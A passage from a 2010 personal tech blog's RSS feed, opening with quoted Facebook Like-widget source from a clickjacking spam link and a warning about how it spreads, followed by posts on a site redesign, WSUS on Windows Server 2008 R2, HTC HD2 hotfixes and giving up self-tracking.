<div id="_mcePaste">Bootloader.enableBootload({&#8220;async&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;dialog&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;dom-form&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;async-postlude&#8221;:["F+B8D","WZ0fA","uCKJ8","NJtdf"],&#8221;vector&#8221;:["F+B8D","WZ0fA"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["WZ0fA"]);Arbiter.inform(&#8220;BOOTLOAD\/ROADRUNNER_READY&#8221;, true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);&lt;/script&gt;&lt;script type=&#8221;text/javascript&#8221;&gt;</div>
<div id="_mcePaste">onloadRegister(function(){Bootloader.configurePage(["uCKJ8"]);});</div>
<div id="_mcePaste">Bootloader.done(["uCKJ8"]);</div>
<div id="_mcePaste">onloadRegister(function (){window.__UIControllerRegistry["c4c2f1e4c2153e615066df"] = new ExternalPageLikeWidget({&#8220;viewer&#8221;:0,&#8221;channelURL&#8221;:&#8221;",&#8221;nodeType&#8221;:&#8221;link&#8221;,&#8221;externalURL&#8221;:&#8221;http:\/\/thecraziesttattoos.blogspot.com\/&#8221;,&#8221;pageId&#8221;:null,&#8221;widgetID&#8221;:&#8221;connect_widget_4c2f1e4c211ae5e7d0191&#8243;,&#8221;alreadyConnected&#8221;:false,&#8221;viewerIsAdmin&#8221;:false,&#8221;adminUrl&#8221;:&#8221;",&#8221;showFaces&#8221;:true,&#8221;useUnlikeLink&#8221;:false,&#8221;layout&#8221;:&#8221;standard&#8221;,&#8221;commentWidgetMarkup&#8221;:&#8221;",&#8221;error&#8221;:null,&#8221;autoResize&#8221;:true,&#8221;actionText&#8221;:null,&#8221;abtestunlike&#8221;:false,&#8221;userOptedOut&#8221;:false,&#8221;showCaptcha&#8221;:false,&#8221;isBlocked&#8221;:false}); ;;});</div>
<div id="_mcePaste">onloadRegister(function (){try {document.execCommand(&#8220;BackgroundImageCache&#8221;, false, true);} catch (ignored) {};});</div>
<div id="_mcePaste">&lt;/script&gt;&lt;/body&gt;</div>
<div id="_mcePaste">&lt;/html&gt;</div>
<p>&lt;!DOCTYPE html PUBLIC &#8220;-//W3C//DTD XHTML 1.0 Strict//EN&#8221;   &#8220;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&#8221;&gt;&lt;html xmlns=&#8221;http://www.w3.org/1999/xhtml&#8221; xml:lang=&#8221;nl&#8221; lang=&#8221;nl&#8221; id=&#8221;facebook&#8221;&gt;&lt;head&gt;&lt;meta http-equiv=&#8221;Content-type&#8221; content=&#8221;text/html; charset=utf-8&#8243; /&gt;&lt;meta http-equiv=&#8221;Content-language&#8221; content=&#8221;nl&#8221; /&gt;&lt;script type=&#8221;text/javascript&#8221;&gt;//&lt;![CDATA[CavalryLogger=false;window._is_quickling_index="";//]]&gt;&lt;/script&gt;&lt;noscript&gt; &lt;meta http-equiv=refresh content=&#8221;0; URL=?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp;amp%3Blayout=standard&amp;amp;amp%3Bshow_faces=false&amp;amp;amp%3Bwidth=450&amp;amp;amp%3Baction=like&amp;amp;amp%3Bfont=tahoma&amp;amp;amp%3Bcolorscheme=light&amp;amp;amp%3Bheight=80&amp;amp;_fb_noscript=1&#8243; /&gt; &lt;/noscript&gt;<br />
&lt;meta name=&#8221;robots&#8221; content=&#8221;noodp,noydir&#8221; /&gt;&lt;meta name=&#8221;description&#8221; content=&#8221; Facebook is een sociaal netwerk dat vrienden, collega&amp;#039;s, studiegenoten en kennissen met elkaar in contact brengt. Gebruik Facebook om op de hoogte te blijven van hoe het met je vrienden gaat, om onbeperkt foto&amp;#039;s te uploaden, links en video&amp;#039;s uit te wisselen en meer te weten te komen over de mensen die je ontmoet.&#8221; /&gt;&lt;link rel=&#8221;alternate&#8221; media=&#8221;handheld&#8221; href=&#8221;http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp;amp%3Blayout=standard&amp;amp;amp%3Bshow_faces=false&amp;amp;amp%3Bwidth=450&amp;amp;amp%3Baction=like&amp;amp;amp%3Bfont=tahoma&amp;amp;amp%3Bcolorscheme=light&amp;amp;amp%3Bheight=80&#8243; /&gt;<br />
&lt;link type=&#8221;text/css&#8221; rel=&#8221;stylesheet&#8221; href=&#8221;http://static.ak.fbcdn.net/rsrc.php/z9V3V/hash/cn4ut1mh.css&#8221; /&gt;<br />
&lt;script type=&#8221;text/javascript&#8221; src=&#8221;http://b.static.ak.fbcdn.net/rsrc.php/z78UV/hash/abtj54l6.js&#8221;&gt;&lt;/script&gt;&lt;title&gt;The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED | Facebook&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;div id=&#8221;FB_HiddenContainer&#8221; style=&#8221;position:absolute; top:-10000px; width:0px; height:0px;&#8221; &gt;&lt;/div&gt;&lt;div id=&#8221;connect_widget_4c2f1e4c211ae5e7d0191&#8243;&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;div&gt;&lt;div&gt;&lt;a&gt;&lt;span&gt;Vind ik leuk&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td&gt;&lt;div&gt;&lt;div&gt;&lt;span style=&#8221;"&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;Jij en 4.494 anderen vinden dit leuk.&lt;/span&gt;&lt;span&gt;4.494 personen vinden dit leuk.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;middot;&amp;nbsp;&lt;a&gt;Beheerderspagina&lt;/a&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;middot;&amp;nbsp;&lt;a&gt;Fout&lt;/a&gt;&lt;/span&gt;&lt;span&gt;&lt;a href=&#8221;#&#8221;&gt;Vind ik niet leuk&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span&gt;Je vindt &lt;b&gt;The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED&lt;/b&gt; leuk.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;script type=&#8221;text/javascript&#8221;&gt;Env={module:&#8221;like_widget&#8221;,impid:&#8221;c29bdf52&#8243;,user:0,locale:&#8221;nl_NL&#8221;,method:&#8221;GET&#8221;,dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:262076,vip:&#8221;66.220.147.44&#8243;,static_base:&#8221;http:\/\/static.ak.fbcdn.net\/&#8221;,www_base:&#8221;http:\/\/www.facebook.com\/&#8221;,tlds:["com"],rep_lag:2,pc:{&#8220;m&#8221;:&#8221;1.0.4&#8243;,&#8221;l&#8221;:&#8221;1.0.4&#8243;,&#8221;axi&#8221;:true,&#8221;j&#8221;:true,&#8221;bsz&#8221;:16},fb_dtsg:&#8221;4hbEx&#8221;,lhsh:&#8221;7b555S0gTjO7Ys4xJtZKuBAfETw&#8221;,silent_oops_errors:&#8221;1&#8243;};&lt;/script&gt;<br />
&lt;script type=&#8221;text/javascript&#8221;&gt;Bootloader.setResourceMap({&#8220;WZ0fA&#8221;:{&#8220;name&#8221;:&#8221;js\/3mzx17quneyo8kc4.pkg.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zB4BM\/hash\/d1w9lhbq.js&#8221;},&#8221;uCKJ8&#8243;:{&#8220;name&#8221;:&#8221;css\/dr0uq2rbrrww0cgc.pkg.css&#8221;,&#8221;type&#8221;:&#8221;css&#8221;,&#8221;permanent&#8221;:1,&#8221;src&#8221;:&#8221;http:\/\/static.ak.fbcdn.net\/rsrc.php\/z9V3V\/hash\/cn4ut1mh.css&#8221;},&#8221;F+B8D&#8221;:{&#8220;name&#8221;:&#8221;js\/19khsprwvtvokwow.pkg.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z78UV\/hash\/abtj54l6.js&#8221;},&#8221;NJtdf&#8221;:{&#8220;name&#8221;:&#8221;js\/lib\/net\/async_postlude.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2ATW\/hash\/835vzsrg.js&#8221;}});Bootloader.enableBootload({&#8220;async&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;dialog&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;dom-form&#8221;:["F+B8D","WZ0fA","uCKJ8"],&#8221;async-postlude&#8221;:["F+B8D","WZ0fA","uCKJ8","NJtdf"],&#8221;vector&#8221;:["F+B8D","WZ0fA"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["WZ0fA"]);Arbiter.inform(&#8220;BOOTLOAD\/ROADRUNNER_READY&#8221;, true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);&lt;/script&gt;&lt;script type=&#8221;text/javascript&#8221;&gt;<br />
onloadRegister(function(){Bootloader.configurePage(["uCKJ8"]);});Bootloader.done(["uCKJ8"]);</p>
<p>onloadRegister(function (){window.__UIControllerRegistry["c4c2f1e4c2153e615066df"] = new ExternalPageLikeWidget({&#8220;viewer&#8221;:0,&#8221;channelURL&#8221;:&#8221;",&#8221;nodeType&#8221;:&#8221;link&#8221;,&#8221;externalURL&#8221;:&#8221;http:\/\/thecraziesttattoos.blogspot.com\/&#8221;,&#8221;pageId&#8221;:null,&#8221;widgetID&#8221;:&#8221;connect_widget_4c2f1e4c211ae5e7d0191&#8243;,&#8221;alreadyConnected&#8221;:false,&#8221;viewerIsAdmin&#8221;:false,&#8221;adminUrl&#8221;:&#8221;",&#8221;showFaces&#8221;:true,&#8221;useUnlikeLink&#8221;:false,&#8221;layout&#8221;:&#8221;standard&#8221;,&#8221;commentWidgetMarkup&#8221;:&#8221;",&#8221;error&#8221;:null,&#8221;autoResize&#8221;:true,&#8221;actionText&#8221;:null,&#8221;abtestunlike&#8221;:false,&#8221;userOptedOut&#8221;:false,&#8221;showCaptcha&#8221;:false,&#8221;isBlocked&#8221;:false}); ;;});onloadRegister(function (){try {document.execCommand(&#8220;BackgroundImageCache&#8221;, false, true);} catch (ignored) {};});</p>
<p>&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</p></blockquote>
<p>Within that code you will see that it tries to load your Facebook profile, and since you clicked on the image, stating you are over 18 &#8211; you automatically &#8216;like&#8217; the link, which will be shown on your feed.</p>
<p>Other friends see the link on your wall, click on it and it continues with them.</p>
<p>Be safe, and don&#8217;t click on links that you do not trust, even from friends!</p>
<p>Note;</p>
<p>The link has been reported to the relevant people.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/facebook-spam-link-341/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New functionality and appearance on the site</title>
		<link>http://www.majoraap.com/new-functionality-and-appearance-on-the-site-335?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=new-functionality-and-appearance-on-the-site</link>
		<comments>http://www.majoraap.com/new-functionality-and-appearance-on-the-site-335#comments</comments>
		<pubDate>Mon, 28 Jun 2010 20:05:42 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Site Related news]]></category>
		<category><![CDATA[fun]]></category>
		<category><![CDATA[site]]></category>
		<category><![CDATA[statistics]]></category>
		<category><![CDATA[stats]]></category>
		<category><![CDATA[updating]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=335</guid>
		<description><![CDATA[Since it&#8217;s been a while &#8211; I changed the site&#8217;s theme again. I thought it would look nice and it indeed does, but the work is not yet done. It does have added functionality &#8211; such as the Twitter posts &#8230; <a href="http://www.majoraap.com/new-functionality-and-appearance-on-the-site-335">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Since it&#8217;s been a while &#8211; I changed the site&#8217;s theme again. I thought it would look nice and it indeed does, but the work is not yet done. It does have added functionality &#8211; such as the Twitter posts that I recently made and related posts. I have also enabled the comments again. There is a filter in place, as to avoid some of the spamming that is bound to happen. Additionally, comments are only allowed on posts that have been created in the last 30 days.</p>
<p><span id="more-335"></span></p>
<p>You might have also noticed that this site is experiencing slower then usual response-times and an occasional outage (21 hours this running month) I am looking at resolving this, but until then please endure with me. I hope to have this all sorted shortly, and the last few glitches sorted out.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/new-functionality-and-appearance-on-the-site-335/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 2008 R2 with WSUS 3.0 SP2 running on SQL 2008 R2</title>
		<link>http://www.majoraap.com/windows-2008-r2-with-wsus-3-0-sp2-running-on-sql-2008-r2-332?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=windows-2008-r2-with-wsus-3-0-sp2-running-on-sql-2008-r2</link>
		<comments>http://www.majoraap.com/windows-2008-r2-with-wsus-3-0-sp2-running-on-sql-2008-r2-332#comments</comments>
		<pubDate>Wed, 09 Jun 2010 09:10:09 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=332</guid>
		<description><![CDATA[In case anyone is wondering whether or not it works; it does. Note; I did upgrade Windows 2008 R2 with all of the patches available at that time (as of 8 June 2010) I was using a 180 day trial &#8230; <a href="http://www.majoraap.com/windows-2008-r2-with-wsus-3-0-sp2-running-on-sql-2008-r2-332">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In case anyone is wondering whether or not it works; it does.</p>
<p>Note;</p>
<ul>
<li>I did upgrade Windows 2008 R2 with all of the patches available at that time (as of 8 June 2010)</li>
<li>I was using a 180 day trial of both Windows 2008 R2 Enterprise Edition and SQL Server 2008 R2.</li>
<li>I installed Windows Server Update Services 3.0 SP2 via the Server Manager of Windows Server 2008.</li>
<li>All of the software is 64-bit</li>
<li>I used a HyperV virtual PC to test this out, which was connected to the actual network and Active Directory</li>
</ul>
<p>Just be sure to select the option to use the local database during the installation of WSUS (I installed SQL locally on the same machine) The reason why I did this is to run a trial of SCCM 2007 R2 (Microsoft System Center Configuration Manager) on that machine. That same machine will then also replace a current WSUS instance on another server.</p>
<p>Expect more on this in the future!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/windows-2008-r2-with-wsus-3-0-sp2-running-on-sql-2008-r2-332/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HD2 Hotfixes including ROM-upgrade, stability and security fixes.</title>
		<link>http://www.majoraap.com/hd2-hotfixes-including-rom-upgrade-stability-and-security-fixes-324?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hd2-hotfixes-including-rom-upgrade-stability-and-security-fixes</link>
		<comments>http://www.majoraap.com/hd2-hotfixes-including-rom-upgrade-stability-and-security-fixes-324#comments</comments>
		<pubDate>Sun, 06 Jun 2010 10:00:19 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[HD2]]></category>
		<category><![CDATA[updating]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=324</guid>
		<description><![CDATA[In case you have a HD2 &#8211; regardless of the provider &#8211; in the Netherlands please be sure to apply the following hotfixes from HTC; (these updates might also be available in your country, so be sure to hit HTC &#8230; <a href="http://www.majoraap.com/hd2-hotfixes-including-rom-upgrade-stability-and-security-fixes-324">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In case you have a HD2 &#8211; regardless of the provider &#8211; in the Netherlands please be sure to apply the following hotfixes from HTC; (these updates might also be available in your country, so be sure to hit HTC up at www.htc.com and select your country to check!)</p>
<p><b>Update for HTC HD2 Opening Java-messages</b>;<br />
<a href="http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=921">http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=921</a><br />
<i>Even if you do not update anything else, please install this security update. It will prevent your HTC HD2 from immediately (without prompting) opening Java messages, leaving your phone (and data) vulnerable to a lot of exploits, hacks, deletion and so on.</i></p>
<p><b>Update for HTC HD2 Music Stability</b>;<br />
<a href="http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=938">http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=938</a><br />
<i>It still stutters at times, but a lot less frequently</i></p>
<p><b>Update for HTC HD2 Car Kit Mode Function Enhancement</b>;<br />
<a href="http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=940">http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=940</a></p>
<p><b>Update for HTC HD2 Facebook Albums</b>;<br />
<a href="http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=918">http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=0&#038;dl_id=918</a></p>
<p>There also is a ROM upgrade for Vodafone NL customers, which upgrades your ROM version to 1.72.172.0. Note; this only applies to Vodafone HTC HD2&#8242;s and does not apply to any others!</p>
<p><b>HTC HD2 ROM upgrade for Vodafone NL customers only</b>;<br />
<a href="http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=2&#038;dl_id=920">http://www.htc.com/nl/SupportDownload.aspx?p_id=297&#038;cat=2&#038;dl_id=920</a></p>
<p>Once you have applied these updates, be aware that you will need to apply them again in case you hard-reset or wipe your phone. Of course, this excludes the ROM update for Vodafone. As a tip; the ROM update for Vodafone does not necessarily include the other updates so be sure to apply them as well.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/hd2-hotfixes-including-rom-upgrade-stability-and-security-fixes-324/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Letting go of the numbers</title>
		<link>http://www.majoraap.com/letting-go-of-the-numbers-321?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=letting-go-of-the-numbers</link>
		<comments>http://www.majoraap.com/letting-go-of-the-numbers-321#comments</comments>
		<pubDate>Sat, 22 May 2010 10:34:59 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[burnout]]></category>
		<category><![CDATA[busy]]></category>
		<category><![CDATA[statistics]]></category>
		<category><![CDATA[stats]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=321</guid>
		<description><![CDATA[For a while I was using infometrics to measure my caffeine-intake, my hours of sleep a given day, the amount of sugar I consumed &#8211; and even how happy I was on the happiness ratio-scale. Recently as you may know, &#8230; <a href="http://www.majoraap.com/letting-go-of-the-numbers-321">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>For a while I was using infometrics to measure my caffeine-intake, my hours of sleep a given day, the amount of sugar I consumed &#8211; and even how happy I was on the happiness ratio-scale. Recently as you may know, I was and am in the process of moving into a new place &#8211; and my girlfriend moving in. Some might call it a major change, others a minor one.</p>
<p>During and after the move I no longer tracked or kept track of all of those infometrics. Why would I? It has served it&#8217;s purpose; I am aware that I need to watch the amount of sugar I consume, I stopped drinking caffeine completely &#8211; and well, my sleep is what it is. I learned a lot from tracking all of it though.</p>
<p>Throughout the last few months I have begun to shift my focus away from trivial matters and started focussing more on the things and people I care about. I have become more protective of those important items, and dropped anything that wasn&#8217;t important or mattered. </p>
<p>One of the other &#8216;casualties&#8217; that I no longer use, is Google Reader. I have un-subscribed from all of my feeds (par my friends) and am quite happy with it. Why would I need to know everything that happens all the time? I stopped watching news and reading newspapers a long time ago but yet was still reading it via RSS. Granted, it was news from sources that I found interesting &#8211; but still.</p>
<p>In this hectic life with information, data and charts flowing around us all the time I stepped out of the noise &#8211; and into the calm. What I see, read and watch is about what I want to &#8211; when I want to. And it&#8217;s not backlogged, saved or stored. I jump into the stream of information when and how I want, and get out &#8211; when I want. </p>
<p>If anything, I am more happy and content with what I have, get and give. And about what I don&#8217;t see, hear or get in my inbox.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/letting-go-of-the-numbers-321/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.majoraap.com @ 2012-02-06 04:42:06 by W3 Total Cache -->
